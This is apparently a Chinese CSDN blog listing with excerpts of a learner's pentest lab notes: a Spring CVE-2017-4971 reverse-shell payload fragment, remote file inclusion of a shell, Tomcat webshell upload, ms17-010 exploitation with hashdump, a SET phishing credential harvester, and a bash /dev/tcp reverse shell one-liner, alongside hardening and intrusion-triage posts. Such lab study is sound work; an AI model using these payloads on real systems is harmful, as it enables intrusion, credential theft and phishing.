自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(44)
  • 收藏
  • 关注

原创 spring CVE-2017-4971漏洞复现

搭建漏洞环境:cd vulhub/spring/CVE-2017-4971docker-compose up -d查看容器是否开启:在浏览器打开网站:填写合法信息:此处存在命令执行,可反弹shell使用如下反弹shell的Payload:_eventId_confirm=&_csrf=57033da7-4538-42ec-9933-e12ac3e97db5&_(new+java.lang.ProcessBuilder("bash","-.

2022-03-17 20:18:17 3768

原创 PHP文件包含

本地文件包含打开PHPstudy:打开网站根目录,创建文件,文件内容为:在浏览器上查看所包含文件:远程文件包含文件include.php文件内容:print.txt文件内容:远程查看print.txt:远程包含shellshell.txt文件内容:访问:http://目标机ip/00/include.php?page=http://攻击机ip/00/shell.txt...

2022-02-28 15:14:26 196

原创 Tomcat任意文件上传

打开Tomcat:打开burpsuite对Tomcat页面进行拦截:在文件夹中找到冰蝎:在冰蝎目录中找到shell.jsp查看把shell.jsp文件内容复制到刚刚拦截的内容下:发送到Response测试:回显:打开冰蝎:双击新增网站:文件上传成功:...

2022-02-24 17:31:20 448

原创 upload-labs1-5

用浏览器打开upload:第一关-js检查上传文件会获得提示把文件后缀改为.jpg/.png/.gif,我这里用的是jpg:打开burpsuite在upload上传修改后的文件进行爪包:在burpsuite中修改文件进行回显:第二关仅判断Content-type类型上传文件失败,对文件进行爪包:在burpsuite修改Content-type类型为image/jpeg、image/png、image/gif的任意一种进行回显:...

2022-02-24 16:48:25 4125

原创 SQLmap基础使用

实验环境操作系统:Windows10安装的应用软件:Sqlmap、FireFox浏览器插件HackBar;Apache、MySQL、PHP;DVWA、SQLi-Labs漏洞网站环境实验步骤1.访问SQLi-Labs网站Less-3http://靶机ip/sql/Less-3登录后,根据网页提示,先给定一个GET参数:/http://靶机ip/sql/Less-3/?id=12.启动SQLmap找到SQLmap所在目录输入cmd进入命令行,输入命令启动SQLma

2022-02-18 19:52:13 706

原创 HTTP头部注入

实验环境攻击机:Windows10安装应用软件:Sqlmap、Burpsuite、FireFox浏览器插件HackBar等靶机:SQLi-Labs安装应用软件:apache、MySQL、PHP;DVWA、SQLi-Labs漏洞网站环境实验步骤1.访问SQLi-Labs网站访问靶机SQLi-Labs上的Less-11:http://靶机ip/sql/Less-182.利用Burpsuite工具爪包(1)启动Burpsuite(2)设置Burpsui.

2022-02-18 15:50:46 3213

原创 SQLi-Labs 基于报错的SQL注入

实验环境操作系统:Windows10安装应用软件:Sqlmap、Burpsuite、FireFox浏览器插件Hackbar等靶机:A-SQLi-Labs安装的应用软件:Apache、MYSQL、PHP;DVWA、SQLi-Labs实验步骤:1.访问目标网站在Windows10上打开火狐浏览器,并访问靶机上的SQLi-labs网站Less-1http://靶机ip/sql/Less-1登录后,先给一个GET参数:http://靶机ip/sql/Less-1/?i

2022-02-17 20:12:57 2487

原创 C段扫描

1.安装masscan工具所需依赖环境:apt-get install git gcc make libpcap-dev2.安装masscan工具,并进行编译:git clone https://github.com/robertdavidgraham/masscancd masscanmake3.C段探测,输入命令:masscan -p 80 ip/24 --rate 10000 -oL output.txt4.查看masscan扫描结果:head out.

2022-01-16 21:32:26 355

原创 aquatone工具使用

1.打开终端,进入工具查看aquatone参数:2.使用aquatone-discover命令,对已授权目标域名进行信息探测:aquatone-discover -d sangfor.com.cn -t 1 -s 2搜索结果:

2022-01-16 20:49:15 387

原创 theHarvester工具子域名收集

一、使用theHarvester工具1.打开终端,进入工具:theHarvester2.查看参数的说明文档:theHarvester --help3.使用搜索引擎进行搜索:theHarvester -d sangfor.com.cn -b bing4.使用DNS爆破参数:theHarvester -d sangfor.com.cn -c搜索结果:...

2022-01-16 20:33:38 553

原创 DNS信息查询

一、利用whois命令进行域名查询1.查询目标域名:whois sangforedu.com.cn2.用发现的新域名继续查询:whois sangfor.com.cn3.通过查询出的邮箱,利用站长之家网站进行反查:可获得其他域名,用其他域名查询:二、利用nslookup进行查询(Windows系统)1.打开终端,进入nslookup:nslookup2.查询A类记录:set querytype=aset allsangforedu...

2022-01-16 20:16:00 629

原创 密码攻击工具

打开终端启动Metasploit终端msfconsole利用ms17-010进行溢出攻击use exploit/windows/smb/ms17_010_eternalblueset LHOST 192.168.52.129set RHOST 192.168.52.135set RPORT 445set target 0run溢出攻击成功后显示meterpreter提示符:获取靶机windows7账户密码的Hash值:hashdump2. 利用H..

2022-01-13 20:25:38 1954

原创 set配置

在kali操作系统上启动终端,使用以下命令进入SET:setoolkit2.利用SET构建钓鱼网站(1)在SET主菜单选择第一项1 Social-Engineering Attacks(2)继续选择第二项2 Website Attack Vectors(3)继续选择第三项3 Credential Harvester Attack Method(4)继续选择菜单11 Web Templates输入操作机ip,作为钓鱼网站的地址:选择菜...

2022-01-13 19:40:52 229

原创 Metasploit工具配置使用

1.在操作系统kali上打开终端,使用以下命令启动Metasploit终端:msfconsole2.检查靶机是否存在ms17-010漏洞(1)搜索ms17-010相关模块:search ms17-010(2)分别输入以下命令,使用amb_ms17_010模块进行漏洞检测,确认其存在ms17-010漏洞:use auxiliary/scanner/smb/smb_ms17_010 //使用模块show options //查看模块需要设置哪些参数set RHOSTS .

2022-01-13 18:14:56 2747

原创 深信服产品介绍

传统防火墙(包过滤防火墙)判断信息:数据包的源ip地址、协议类型、源端口、目的端口(五元组)工作范围:网络层、传输层(3-4层)和路由器的区别:1.普通的路由器只检查数据包的目标地址,并选择一个达到目的地址的最佳路径。 2. 防火墙除了要决定目的路径以外还需要根据已经设定的规则进行判断是不是。技术应用:包过滤技术优势:对于小型站点容易实现,处理速度快,价格便宜劣势:规则表很快会变得庞大复杂难运维,只能基于五元组应用代理防火墙判断信...

2021-12-30 20:30:06 4166

原创 GRE虚拟隧道配置

GRE拓扑:配置ip:client1172.16.1.1172.16.1.254server1192.168.1.1192.168.1.254配置路由:R1syssys peer1int g0/0/0ip address 172.16.1.254 24int g0/0/1ip address 100.100.100.1 30quitip route-static 0.0.0.0 0 100.100.100.2R3sysint g0/0/1i.

2021-12-30 19:29:42 522

原创 【ACL】

ACL拓扑图:PC配置:Client1192.168.1.1192.168.1.254Client2192.168.2.1192.168.2.254Server1192.168.3.1192.168.3.254Server2192.168.4.1192.168.4.254基础配置LSW1syssysname SW1vlan batch 10 20 30int e0/0/1port link-type accessport default vlan.

2021-12-23 20:22:53 83

原创 单臂路由

单臂路由拓扑图:PC配置:PC1192.168.1.1255.255.255.0192.168.1.254PC3192.168.2.1255.255.255.0192.168.2.254配置单臂路由:LSW1syssysname SW1vlan batch 10 20int e0/0/1port link-ytpe accessport default vlan 10int e0/0/2port link-ytpe accessport def.

2021-12-23 18:52:01 68

原创 如何实现vlan

拓扑图:配置PCPC1ip:192.168.1.1子网掩码:255.255.255.0PC2192.168.1.2255.255.255.0PC3192.168.1.3255.255.255.0PC4192.168.1.4255.255.255.0配置LSWLSW1syssysname SW1vlan batch 10 20int e0/0/1port link-type accessport default vlan 10.

2021-12-22 20:08:32 812

原创 动态路由配置【华为】

构建拓扑图:PC配置:PC1192.168.1.1255.255.255.252192.168.1.2PC2192.168.7.2255.255.255.252192.168.7.1PC3192.168.5.2255.255.255.252192.168.5.1配置路由:R1syssysname R1int g0/0/0ip address 192.168.1.2 30int g0/0/2ip address 192.168.2.1...

2021-12-22 19:40:09 1743 1

原创 华为配置静态路由

实验拓扑图:配置网段:配置PC配置R1网口:sys //进入配置试图sysname R1 //改名interface g0/0/0 //进入g0/0/0网口ip address 192.168.1.2 30 //配置接口IP(undo ip address //删除接口IP)display this //查看当前配置信息interface g0/0/1ip address 192.168.2.1 30int g0/0/2 //进入0/0/2配置接口...

2021-12-21 20:19:12 265

原创 TCP/IP协议栈模型分析

1.标准TCP/IP协议栈模型标准TCP/IP协议是用于计算机通信的一组协议,通常被称为TCP/IP协议栈,以它为基础组建的互联网是目前国际上规模最大的计算机网络。正因为互联网的广泛应用,使得TCP/IP成为了事实上的网络标准。2.OSI七层模型与TCP/IP协议栈模型对应关系网络接口层--对应OSI参考模型的物理层和数据链路层;网络层--对应OSI参考模型的网络层;运输层--对应OSI参考模型的运输层;应用层--对应OSI参考模型的会话层、表示层、应用层3.各个层对应协议有

2021-12-20 19:47:49 91

原创 Linux入侵排查

1.1账号安全账号入侵排查查询特权用户特权用户(uid 为0):查询可以远程登录的帐号信息:awk '/\$1|\$6/{print $1}' /etc/shadow除root帐号外,其他帐号是否存在sudo权限。如非管理需要,普通帐号应删除sudo权限:more /etc/sudoers | grep -v "^#\|^$" | grep "ALL=(ALL)"禁用或删除多余及可疑的帐号:usermod -L user 禁用帐号,帐号无法登录,/e...

2021-12-17 20:57:58 1704

原创 Windows入侵排查

1.1检查系统账号安全1.检查服务器是否存在可以账号、新增账号:打开cmd,输入lusrmgr.msc如果有立即禁用或删除掉2.检查服务器是否存在隐藏账号、克隆账号:检查方法: a、打开注册表 ,查看管理员对应键值。 b、使用D盾_web查杀工具,集成了对克隆账号检测的功能。3. 结合日志,查看管理员登录时间、用户名是否存在异常:win+r输入eventvwr.msc,回车打开事件查看器1.2检查异常端口、进程1.检查端口连接情况,是否有远程连接、可疑连接.

2021-12-17 20:04:21 1455

原创 漏洞工具使用

Awvs基础使用如果没有安装docker,先安装docker:yum -y install docker启动docker:systemctl start docker安装awvsdockerpull secfa/docker-awvs拉取awvs:dockerrun -it -d -p 13443:3443 secfa/docker-awvs在浏览器上访问https://ip:13443如果无法访问关闭防火墙试试登录页面添加扫描IP:进行扫描:Goby使用..

2021-12-16 20:45:44 719

原创 logparser的使用

官网下载logparser工具:解压到打开logparser:在win搜索管理员运行查看当前日志所支持的字段:LogParser.exe -h -i:evt最基本的格式:LogParser–i:输入文件的格式–o:输出格式“SQL语句”执行命令:LogParser.exe -i:EVT –o:DATAGRID"SELECTEventID,TimeGenerated as LoginTime,EXTRACT_TOKEN(Strings,5,'|'...

2021-12-16 20:35:28 1284

原创 windows隐藏账户处置

一台Windows server2012 r2一、使用命令行创建用户1.打开命令行:win+r输入cmd回车2.新建test$账户net user test$ sxf!7890 /addnet localgroup administrators test$ /add二、观察test$用户1.使用计算机管理工具查看test$用户2.使用命令行查看用户在命令行输入:net user无法看到test$用户三、导出test$和admi...

2021-12-15 19:33:37 693

原创 安全配置

Windows安全配置打开策略组:win+r 输入gpedit.msc回车找到密码策略配置:计算机配置-Windows设置-安全设置-账户策略-密码策略配置账户锁定阈值:计算机配置-Windows设置-安全设置-账户策略-账户锁定策略配置安全选项:计算机配置-Windows设置-安全设置-本地策略-安全选项账户:阻止Microsoft账户交互式登录设置用户账户控制高级安全审核配置账户登录:计算机管理配置-Windows设置-安全设置-高级...

2021-12-14 17:26:13 4466

原创 Windows系统主机加固

1.禁用Guest账户和无关账户操作流程:按win键输入计算机管理->本地用户和组->用户->Guest右键属性,勾住禁用账户确定2.密码策略加强操作流程:按win键输入本地安全策略->账户策略->密码策略进行加固3.账户策略加强操作流程:按win键输入本地安全策略->账户策略->账户锁定策略“账户额锁定阀值”设置为 5 次“账户锁定时间”设置为 15分钟“复位账户锁定计数器”设置为 15分钟根据自己意愿进行加固

2021-12-09 20:36:03 1393

原创 Windows基础

Win+r 输入cmd跳出dos系统界面输入:dir 列出所有文件cd 进入某一个目录cd .. 返回上一个目录dir /a 显示全部目录文件夹有空格,需要双引号:没有空格,不需要双引号:切换到其他盘符:D:或者D盘输入cmd,然后回车创建文件夹:md 文件名显示当前目录中的子文件与文件夹:dir显示隐藏文件:dir /a只显示当前文件目录中的子文件夹与文件的文件名:dir /b指定命令详细用法:tree /?tree...

2021-12-09 18:53:30 93

原创 Linux主机系统加固

账号和口令查看有多少账号:cat /etc/shadow[root@bogon shang]# cat /etc/shadowroot:$6$J1F7QX7CP.F8vNoz$lt8NHdRp3HzH.M8IxtW0uzWpmKUIDk0mLsSRwvmgULlP0o3ylzs77LbFV6MaJH4yfoGaK02vmnDFpl79hfcVT/::0:99999:7:::bin:*:18353:0:99999:7:::删除无用账户:userdel[root@bogon shang

2021-12-07 19:48:02 394

原创 加密与解密

OPENSSL基础使用实验步骤创建一个文件,用于被加密,文件内容为12345,文件名为test[root@bogon shang]# echo 12345 > test.txt一、对称加密1.使用rc4加解密加密:openssl enc -e -rc4 -in test.txt -out test_rc4.encopenssl enc -e -rc4 -in test.txt -out test_rc4.enc[root@bogon shang]# openssl enc

2021-12-06 20:59:42 364

原创 DNSlog使用

打开dnslog平台:点击Get SunDomain获取域名并复制:复制完打开新网页并粘贴在url上访问,在DNSlog网页内刷新,就会出现一条DNS记录:

2021-12-04 16:13:23 904

原创 PHP错题整理

1.PHP中 的 include 和 require 有什么区别?一旦包含的文件发生错误,require 将停止执行,include 将在错误之后继续执行代码(注:require 一个文件存在错误的话,那么程序就会中断执行了,并显示致命错误。include 一个文件存在错误的话,那么程序不会中断,而是继续执行,并显示一个警告错误。)2.哪个函数用于确定对象类型?is_a()(注:is_a如果对象属于该类型或该类是此对象的父类则返回TRUE。)3.PHP 对空格敏感吗?不敏感.

2021-12-03 18:55:12 556

原创 PHP(二)

windows忘记MySQL用户密码1.以系统管理员身份运行cmd.  2.查看mysql是否已经启动,如果已经启动,就停止:net stop mysql.  3.切换到MySQL安装路径下:D:\WAMP\MySQL-5.6.36\bin;如果已经配了环境变量,可以不用切换了。  4.在命令行输入:mysqld -nt --skip-grant-tables  5.以管理员身份重新启动一个cmd命令窗口,输入:mysql -uroot -p,Enter进入数据库。  6.如果不想改

2021-12-02 21:00:36 57

原创 PHP基础

1.PHP的标记php的标记为<?php 和?>也是最常用的标记(php与?之间没有空格)。echo是PHP中用于输出的语句,可将紧跟其后的字符串、变量、常量的值显示在页面中。<?php echo"我爱CSDN!" ?>2.PHP的注释注释是对代码的解释说明,在php中常用的注释有单行注释“//”和多行注释"/*.....*/".<?php //用来输出 echo"CSDN爱我!" /* 1.调用time()函数产生时间

2021-12-01 20:40:14 62

原创 JavaScript与PHP

JavaScript的用法<script>标签,在HTML页面中插入JavaScript使用<script>标签。JavaScript会在页面加载时向HTML的<body>写文本,<body>文本内容</body>在HTML中放入脚本时,脚本可位于 HTML 的 <body> 或 <head> 部分中,或者同时存在于两个部分中。通常的做法是把函数放入 <head> 部分中,或者放在页面底部。这样就可以

2021-11-30 20:58:24 532

原创 【HTML】

HTML基本介绍:<html></htlm>为文本标题 <!DOCTYPE html>为文档utf-8为编码 <title>为网页题目内容部分为<body></body>是可见页面内容标题<h1></h1>标题下的内容由<p></p>表示<head><meta><title>为投标元素HTML注释<!--注释内容--&g

2021-11-30 08:54:42 1756

原创 TMUX安装和错题整理

TMUX安装:ncurses-devel 需要安装:yum -y install ncurses-devellibevent 的安装:依次输入代码wget https://github.com/libevent/libevent/releases/download/release-2.0.22-stable/libevent-2.0.22-stable.tar.gztar xzvf libevent-2.0.22-stable.tar.gzcd libevent-2.0.22-sta

2021-11-29 17:41:55 604

原创 Linux反弹shell和常见脚本反弹

0x01.bash在攻击主机上进行监听,命令:nc -lvvp port //potr为攻击主机的端口号──(shang㉿bogon)-[~]└─$ nc -lvvp 1234listening on [any] 1234 ...在目标主机上执行,命令:bash -i>& /dev/tcp/攻击主机IP/port 0>&1 攻击主机的代码变为:┌──(shang㉿bogon)-[~]└─$ nc -lvvp 1234listenin...

2021-11-29 16:19:07 139

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除